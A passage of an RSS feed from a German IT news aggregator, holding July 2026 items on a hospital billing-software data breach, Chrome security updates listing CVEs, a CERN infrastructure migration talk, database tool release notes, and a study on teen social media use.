<link>https://tsecurity.de/de/3681688/it-security-nachrichten/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681688/it-security-nachrichten/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/</guid>
<pubDate>Mon, 20 Jul 2026 19:00:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Edinburgh-based tech firm Craneware said customer data was stolen during a cyberattack. The company makes software that thousands of U.S. hospitals, pharmacies, and clinics rely on for billing patients, potentially exposing health data. This article has been indexed from Security…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/">Hackers stole ‘significant’ amount of data from tech firm relied on by thousands of US hospitals and pharmacies</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnePlus Packs Its Bags From the US and Europe, Promises to Support Existing Phones]]></title>
<description><![CDATA[It's also switching from OxygenOS to Oppo's ColorOS.]]></description>
<link>https://tsecurity.de/de/3681599/it-nachrichten/oneplus-packs-its-bags-from-the-us-and-europe-promises-to-support-existing-phones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681599/it-nachrichten/oneplus-packs-its-bags-from-the-us-and-europe-promises-to-support-existing-phones/</guid>
<pubDate>Mon, 20 Jul 2026 18:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's also switching from OxygenOS to Oppo's ColorOS.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers stole ‘significant’ amount of data from tech firm relied on by thousands of US hospitals and pharmacies]]></title>
<description><![CDATA[Edinburgh-based tech firm Craneware said customer data was stolen during a cyberattack. The company makes software that thousands of U.S. hospitals, pharmacies, and clinics rely on for billing patients, potentially exposing health data.]]></description>
<link>https://tsecurity.de/de/3681461/it-nachrichten/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681461/it-nachrichten/hackers-stole-significant-amount-of-data-from-tech-firm-relied-on-by-thousands-of-us-hospitals-and-pharmacies/</guid>
<pubDate>Mon, 20 Jul 2026 17:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Edinburgh-based tech firm Craneware said customer data was stolen during a cyberattack. The company makes software that thousands of U.S. hospitals, pharmacies, and clinics rely on for billing patients, potentially exposing health data.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber Briefing: 2026.07.20]]></title>
<description><![CDATA[Over 2,000 hospitals hit in a major billing software breach, while a sophisticated new malware strain evades EDR tools by routing stolen corporate data through Microsoft 365 calendars. This article has been indexed from CyberMaterial Read the original article: Cyber…
Read more →
The post Cyber Br...]]></description>
<link>https://tsecurity.de/de/3681447/it-security-nachrichten/cyber-briefing-20260720/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681447/it-security-nachrichten/cyber-briefing-20260720/</guid>
<pubDate>Mon, 20 Jul 2026 16:55:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Over 2,000 hospitals hit in a major billing software breach, while a sophisticated new malware strain evades EDR tools by routing stolen corporate data through Microsoft 365 calendars. This article has been indexed from CyberMaterial Read the original article: Cyber…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cyber-briefing-2026-07-20/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cyber-briefing-2026-07-20/">Cyber Briefing: 2026.07.20</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Craneware data breach affects 2,000+ US hospitals]]></title>
<description><![CDATA[Craneware, a healthcare technology company headquartered in Edinburgh and listed on London’s AIM market, has disclosed a data breach affecting more than 2,000 hospitals across the United States. This article has been indexed from CyberMaterial Read the original article: Craneware…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3681293/it-security-nachrichten/craneware-data-breach-affects-2000-us-hospitals/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681293/it-security-nachrichten/craneware-data-breach-affects-2000-us-hospitals/</guid>
<pubDate>Mon, 20 Jul 2026 15:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Craneware, a healthcare technology company headquartered in Edinburgh and listed on London’s AIM market, has disclosed a data breach affecting more than 2,000 hospitals across the United States. This article has been indexed from CyberMaterial Read the original article: Craneware…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/craneware-data-breach-affects-2000-us-hospitals/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/craneware-data-breach-affects-2000-us-hospitals/">Craneware data breach affects 2,000+ US hospitals</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[We Do the Math: The Money You’ll Save Switching to Home LED Lights]]></title>
<description><![CDATA[LED bulbs are a great way to cut energy costs. CNET found out just how much you could save with a house switchover.]]></description>
<link>https://tsecurity.de/de/3680890/it-nachrichten/we-do-the-math-the-money-youll-save-switching-to-home-led-lights/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680890/it-nachrichten/we-do-the-math-the-money-youll-save-switching-to-home-led-lights/</guid>
<pubDate>Mon, 20 Jul 2026 12:48:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LED bulbs are a great way to cut energy costs. CNET found out just how much you could save with a house switchover.]]></content:encoded>
</item>
<item>
<title><![CDATA[Is it worth learning and switching to Linux as an os for college?]]></title>
<description><![CDATA[I'm an incoming accountancy student, I'm not really sure what tools people use besides spreadsheets and stuff, what I'm asking basically is if I can use the same tools or some alternative that still does the job for my course, I can't really give a complete list of the things I need but I want a ...]]></description>
<link>https://tsecurity.de/de/3680109/linux-tipps/is-it-worth-learning-and-switching-to-linux-as-an-os-for-college/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680109/linux-tipps/is-it-worth-learning-and-switching-to-linux-as-an-os-for-college/</guid>
<pubDate>Mon, 20 Jul 2026 01:09:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm an incoming accountancy student, I'm not really sure what tools people use besides spreadsheets and stuff, what I'm asking basically is if I can use the same tools or some alternative that still does the job for my course, I can't really give a complete list of the things I need but I want a general guideline for the things I can open and use. fyi I'm not really that tech savvy so I'll maybe go for ubuntu or mint, so I can't really go making my own stuff, at least if there are no tutorials already up; part of the reason for the switch is that my laptop is pretty old so it runs windows 11 pretty slow, even after debloating so if I have to stay on windows I want to know that it's because it's necessary.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/ilikecookedchicken"> /u/ilikecookedchicken </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v14mrj/is_it_worth_learning_and_switching_to_linux_as_an/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v14mrj/is_it_worth_learning_and_switching_to_linux_as_an/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrating to OpenVox at CERN (voxconf2026)]]></title>
<description><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible tech...]]></description>
<link>https://tsecurity.de/de/3679973/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679973/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</guid>
<pubDate>Sun, 19 Jul 2026 22:46:53 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible technical debt and challenges. We would like to present our journey, past, present and future on our Puppet to Openvox transition

For many organizations, the migration from Puppet to OpenVox might be a matter of swapping repositories and running a package update. For CERN (home to the Large Hadron Collider and tens of thousands of heterogeneous nodes spanning data centers, accelerator controls, and physics analysis grids) it has been an archaeological dig through a decade and a half of institutional configuration history.

This is a post-mortem (and mid-mortem) of a massive enterprise pivot for a system that supports +15000 machines and +400 administrators. In our pursuit of a fully OpenVox-driven infrastructure, we discovered that the technical debt was not in the software itself, but in the abstractions we had built on top of the software. This is a description of the challenges we surpassed and will have coming later on this year (and beyond) to align with CERN's long-term opensource strategy.
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrating to OpenVox at CERN (voxconf2026)]]></title>
<description><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible tech...]]></description>
<link>https://tsecurity.de/de/3679966/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679966/it-security-video/migrating-to-openvox-at-cern-voxconf2026/</guid>
<pubDate>Sun, 19 Jul 2026 22:32:54 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[At CERN we are currently switching our whole infrastructure to Openvox all over the place and would like to contribute by giving a talk during the VoxConf 2026. This switch, although simple for some other organisations (not a simple repo and package switch for us), showed some non-negligible technical debt and challenges. We would like to present our journey, past, present and future on our Puppet to Openvox transition

For many organizations, the migration from Puppet to OpenVox might be a matter of swapping repositories and running a package update. For CERN (home to the Large Hadron Collider and tens of thousands of heterogeneous nodes spanning data centers, accelerator controls, and physics analysis grids) it has been an archaeological dig through a decade and a half of institutional configuration history.

This is a post-mortem (and mid-mortem) of a massive enterprise pivot for a system that supports +15000 machines and +400 administrators. In our pursuit of a fully OpenVox-driven infrastructure, we discovered that the technical debt was not in the software itself, but in the abstractions we had built on top of the software. This is a description of the challenges we surpassed and will have coming later on this year (and beyond) to align with CERN's long-term opensource strategy.
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[26.1.3]]></title>
<description><![CDATA[- AI assistant:
                - Added a setting in Preferences for the maximum wait time for AI Engine responses
                - Fixed the model list display for GitHub Copilot with the free plan
                - Engine settings were redesigned
                - GPT-5 is now used as the defa...]]></description>
<link>https://tsecurity.de/de/3679833/downloads/2613/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679833/downloads/2613/</guid>
<pubDate>Sun, 19 Jul 2026 20:16:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='            - AI assistant:
                - Added a setting in Preferences for the maximum wait time for AI Engine responses
                - Fixed the model list display for GitHub Copilot with the free plan
                - Engine settings were redesigned
                - GPT-5 is now used as the default model for OpenAI
            - Data Editor: Fixed an issue in the Grouping Panel when selecting an item from the "Add" menu required an extra click before applying changes (thanks to @EastLord)
            - Metadata:
                - Fixed schema dropdown width when creating a new constraint
            - Data Transfer:
                - Improved memory usage when importing large CSV files (thanks to @HellAmbro)
                - Fixed CSV export with multi-character quotes and improved quote/delimiter validation
            - Connectivity: Added global network profiles that can be used in all projects
            - Miscellaneous:
                - Added escaping for the pipe character in connection CLI parameters (thanks to @dhufnagel)
                - Removed unnecessary zoom restart prompts on Linux and macOS when moving or resizing the application window (thanks to @elcapo)
                - Fixed color refresh when switching themes (thanks to @anantgupta001)
                - Added the ability to reset font settings to default on the User Interface page in Preferences
            - Databases:
                - Apache Doris: database icon was updated (thanks to @xylaaaaa)
                - Databend driver was updated to version 0.4.8
                - DuckDB: Fixed LIST and ARRAY display in the Data Grid
                - GaussDB: Materialized views are now available in the Navigator tree (thanks to @kkk000111999)
                - Google Cloud SQL - MySQL: Fixed backup and restore failures caused by an exception
                - Greenplum: Fixed an out-of-memory error when loading the table list for schemas with resource groups enabled (thanks to @vaefremov95)
                - MariaDB: Fixed a UI freeze when deleting multiple table columns at once (thanks to @a3894281)
                - MySQL: Fixed an issue when creating a new table failed with an exception (thanks to @HellAmbro)
                - PostgreSQL:
                    - Fixed an issue where the MAINTAIN privilege was not shown for users who had it granted
                    - Fixed an issue where text arrays could be corrupted after editing values containing commas in the Data Grid
                    - Fixed unsupported constraint type warnings for NOT NULL constraints (thanks to @jmax01)
                - SQLite: Fixed an issue where SQL script execution processed only the first line of the script (thanks to @HellAmbro)'><pre class="notranslate"><code>            - AI assistant:
                - Added a setting in Preferences for the maximum wait time for AI Engine responses
                - Fixed the model list display for GitHub Copilot with the free plan
                - Engine settings were redesigned
                - GPT-5 is now used as the default model for OpenAI
            - Data Editor: Fixed an issue in the Grouping Panel when selecting an item from the "Add" menu required an extra click before applying changes (thanks to @EastLord)
            - Metadata:
                - Fixed schema dropdown width when creating a new constraint
            - Data Transfer:
                - Improved memory usage when importing large CSV files (thanks to @HellAmbro)
                - Fixed CSV export with multi-character quotes and improved quote/delimiter validation
            - Connectivity: Added global network profiles that can be used in all projects
            - Miscellaneous:
                - Added escaping for the pipe character in connection CLI parameters (thanks to @dhufnagel)
                - Removed unnecessary zoom restart prompts on Linux and macOS when moving or resizing the application window (thanks to @elcapo)
                - Fixed color refresh when switching themes (thanks to @anantgupta001)
                - Added the ability to reset font settings to default on the User Interface page in Preferences
            - Databases:
                - Apache Doris: database icon was updated (thanks to @xylaaaaa)
                - Databend driver was updated to version 0.4.8
                - DuckDB: Fixed LIST and ARRAY display in the Data Grid
                - GaussDB: Materialized views are now available in the Navigator tree (thanks to @kkk000111999)
                - Google Cloud SQL - MySQL: Fixed backup and restore failures caused by an exception
                - Greenplum: Fixed an out-of-memory error when loading the table list for schemas with resource groups enabled (thanks to @vaefremov95)
                - MariaDB: Fixed a UI freeze when deleting multiple table columns at once (thanks to @a3894281)
                - MySQL: Fixed an issue when creating a new table failed with an exception (thanks to @HellAmbro)
                - PostgreSQL:
                    - Fixed an issue where the MAINTAIN privilege was not shown for users who had it granted
                    - Fixed an issue where text arrays could be corrupted after editing values containing commas in the Data Grid
                    - Fixed unsupported constraint type warnings for NOT NULL constraints (thanks to @jmax01)
                - SQLite: Fixed an issue where SQL script execution processed only the first line of the script (thanks to @HellAmbro)
</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Study Links Teen Boys' ADHD Symptoms To Addictive Social Media Use]]></title>
<description><![CDATA[A new study by researchers at the University of California at San Francisco "adds to growing research linking increased social media use to detrimental effects on attention, memory and cognition," reports the Washington Post:

The study followed more than 11,000 U.S. adolescents over a period of ...]]></description>
<link>https://tsecurity.de/de/3679090/it-security-nachrichten/new-study-links-teen-boys-adhd-symptoms-to-addictive-social-media-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679090/it-security-nachrichten/new-study-links-teen-boys-adhd-symptoms-to-addictive-social-media-use/</guid>
<pubDate>Sun, 19 Jul 2026 09:52:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new study by researchers at the University of California at San Francisco "adds to growing research linking increased social media use to detrimental effects on attention, memory and cognition," reports the Washington Post:

The study followed more than 11,000 U.S. adolescents over a period of five years, with participants first asked about their own social media use at the average age of 12, and surveyed annually through the average age of 16. Researchers found that increases in addictive social media use were followed by rising ADHD one year later — particularly among boys who reported rising addictive social media use at ages 14 and 15. This association was not found consistently in reverse, meaning that ADHD symptoms did not appear to precede higher levels of addictive social media use... "When an individual adolescent's addictive social media use score increased from one year to the next, that same adolescent tended to show an increase in ADHD symptoms in the following year...." [said Jason Nagata, lead author of the study and an associate professor of pediatrics at the University of California at San Francisco]. He urged parents to consider: "Can their kids stop if they want to? Is social media interfering with their schoolwork? Is it impairing their social relationships? Are there addiction-like symptoms, like withdrawal and relapse?" 

Approximately 7 million American children between the ages of 3 and 17 have received an ADHD diagnosis, according to the Centers for Disease Control and Prevention, and boys are diagnosed with ADHD at about twice the rate of girls. The study did not find a clear link between addictive social media use and ADHD among girls, Nagata said. "Some studies do suggest that teenage boys in particular may be more sensitive to immediate reward and sensation-seeking in adolescence," he said. And social media platforms are designed to provide exactly that: "It encourages frequent task-switching, and there's this constant stream of stimulation that might make it harder for adolescents to maintain and sustain attention that is needed for schoolwork and daily life," he said. "The design features of social media offer the constant reinforcement of impulsivity — it offers immediate gratification and novelty and it encourages multitasking, which can then override working memory and executive control." Experts have long noted that this kind of digital exposure is particularly significant during critical stages of mental, social-emotional and cognitive development... 

[I]t's especially important for parents themselves to demonstrate a healthier relationship with screens and social media. "One of our previous findings was that parental screen use is a very strong predictor of kids' screen use," Nagata said.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=New+Study+Links+Teen+Boys'+ADHD+Symptoms+To+Addictive+Social+Media+Use%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F18%2F0327200%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F18%2F0327200%2Fnew-study-links-teen-boys-adhd-symptoms-to-addictive-social-media-use%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/18/0327200/new-study-links-teen-boys-adhd-symptoms-to-addictive-social-media-use?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.124/.125 for Windows and Mac and 150.0.7871.124 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept rest...]]></description>
<link>https://tsecurity.de/de/3678854/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678854/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.124/.125 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.124 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.115..150.0.7871.125?pretty=fuller&amp;n=10000">Log</a></span></p><p dir="ltr"><span>Security Fixes and Rewards</span></p><p dir="ltr"><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:2-M150"><span>15</span></a><span> security fixes. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span>Chrome Security Page</span></a><span> for more information.</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/517100492"><span>517100492</span></a><span>]</span><span> Critical </span><span>CVE-2026-15764: Use after free in Ozone. </span><span>Reported by Google on 2026-05-27</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/518007484"><span>518007484</span></a><span>]</span><span> Critical </span><span>CVE-2026-15765: Use after free in Ozone. </span><span>Reported by Google on 2026-05-29</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/514010477"><span>514010477</span></a><span>]</span><span> High </span><span>CVE-2026-15766: Uninitialized Use in Skia. </span><span>Reported by Google on 2026-05-17</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/514748734"><span>514748734</span></a><span>]</span><span> High </span><span>CVE-2026-15767: Heap buffer overflow in libyuv. </span><span>Reported by Google on 2026-05-19</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/517931625"><span>517931625</span></a><span>]</span><span> High </span><span>CVE-2026-15768: Insufficient policy enforcement in HTML-in-Canvas. </span><span>Reported by Google on 2026-05-29</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/519731111"><span>519731111</span></a><span>]</span><span> High </span><span>CVE-2026-15769: Insufficient validation of untrusted input in Linux Toolkit Theming. </span><span>Reported by Google on 2026-06-03</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/524792614"><span>524792614</span></a><span>]</span><span> High </span><span>CVE-2026-15770: Uninitialized Use in V8. </span><span>Reported by Google on 2026-06-17</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/525177160"><span>525177160</span></a><span>]</span><span> High </span><span>CVE-2026-15771: Insufficient validation of untrusted input in Media. </span><span>Reported by Google on 2026-06-18</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/525317502"><span>525317502</span></a><span>]</span><span> High </span><span>CVE-2026-15772: Use after free in GPU. </span><span>Reported by Google on 2026-06-18</span></p><p dir="ltr"><span>[TBD][</span><a href="https://issues.chromium.org/issues/527676561"><span>527676561</span></a><span>]</span><span> High </span><span>CVE-2026-15773: Use after free in Core. </span><span>Reported by xinchaotian of Microsoft on 2026-06-25</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/530646115"><span>530646115</span></a><span>]</span><span> High </span><span>CVE-2026-15774: Use after free in Skia. </span><span>Reported by Google on 2026-07-03</span></p><p dir="ltr"><span>[TBD][</span><a href="https://issues.chromium.org/issues/531319201"><span>531319201</span></a><span>]</span><span> High </span><span>CVE-2026-15775: Insufficient policy enforcement in V8. </span><span>Reported by wang1r923096443@gmail.com on 2026-07-05</span></p><p dir="ltr"><span>[TBD][</span><a href="https://issues.chromium.org/issues/532595489"><span>532595489</span></a><span>]</span><span> High </span><span>CVE-2026-15776: Type Confusion in V8. </span><span>Reported by Salvatore Gulizia (nickname: Serotav) on 2026-07-08</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/532929679"><span>532929679</span></a><span>]</span><span> High </span><span>CVE-2026-15777: Use after free in UI. </span><span>Reported by Google on 2026-07-09</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/513795122"><span>513795122</span></a><span>]</span><span> Medium </span><span>CVE-2026-15778: Insufficient validation of untrusted input in Navigation. </span><span>Reported by Google on 2026-05-16</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><p dir="ltr"><span><br></span></p><p dir="ltr"><span>Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span>, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span>, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span>, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span>.</span></p><div><span><br></span></div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beta Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The Beta channel is being updated to OS version 16733.19.0 (Browser version 151.0.7922.23) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS Beta Help Com...]]></description>
<link>https://tsecurity.de/de/3678852/it-security-nachrichten/beta-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678852/it-security-nachrichten/beta-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The Beta channel is being updated to OS version 16733.19.0 (Browser version 151.0.7922.23) for most ChromeOS devices.</span></p><span><p dir="ltr"><span>If you find new issues, please let us know one of the following ways:</span></p><br><ol><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></p></li><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><span>Visit our ChromeOS communities</span></p></li><ol><li aria-level="2" dir="ltr"><p dir="ltr" role="presentation"><span>General:</span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span> </span><span>Chromebook Help Community</span></a></p></li><li aria-level="2" dir="ltr"><p dir="ltr" role="presentation"><span>Beta Specific:</span><a href="https://support.google.com/chromeos-beta/community"><span> </span><span>ChromeOS Beta Help Community</span></a></p></li></ol><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span>Report an issue or send feedback on Chrome</span></a></p></li><li aria-level="1" dir="ltr"><p dir="ltr" role="presentation"><span>Interested in switching channels?</span><a href="https://support.google.com/chromebook/answer/1086915"><span> </span><span>Find out how.</span></a></p></li></ol><br><p dir="ltr"><span>Andy Wu</span></p><p dir="ltr"><span>Google ChromeOS</span></p><div><span><br></span></div></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Stable Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 151.0.7922.34/.35 for Windows and Mac as part of our early stable release to a small percentage of users. A full list of changes in this build is available in the log.You can find more details about early Stable releases here.Interested in switching release ...]]></description>
<link>https://tsecurity.de/de/3678848/it-security-nachrichten/early-stable-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678848/it-security-nachrichten/early-stable-update-for-desktop/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The Stable channel has been updated to </span><span>151.0.7922.34/.35</span><span> for Windows and</span><span> </span><span>Mac </span><span>as part of our early stable release to a <span>small percentage of users. </span>A full list of changes in this build is available in the</span><span> </span><span color="rgba(0, 0, 0, 0.87)"><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.125..151.0.7922.34?pretty=fuller&amp;n=10000">log</a></span><span>.</span></p><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><p dir="ltr"><span><span>You can find more details about early Stable releases </span><a href="https://developer.chrome.com/blog/early-stable/"><span>here</span></a><span>.</span></span></p><p dir="ltr"><span>Interested in switching release channels?  Find out how </span><a href="https://www.chromium.org/getting-involved/dev-channel"><span>here</span></a><span>. If you find a new issue, please let us know by </span><a href="https://crbug.com/"><span>filing a bug</span></a><span>. </span><span>The </span><a href="https://support.google.com/chrome/community"><span>community help forum</span></a><span> is also a great place to reach out for help or learn about common issues.</span></p><p><span color="rgba(0, 0, 0, 0.87)"><br></span></p><p dir="ltr"><span>Daniel Yip</span></p><p dir="ltr"><span>Google Chrome</span></p></div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Desktop Update]]></title>
<description><![CDATA[The Beta channel has been updated to 151.0.7922.34 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place ...]]></description>
<link>https://tsecurity.de/de/3678846/it-security-nachrichten/chrome-beta-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678846/it-security-nachrichten/chrome-beta-for-desktop-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:26 +0200</pubDate>
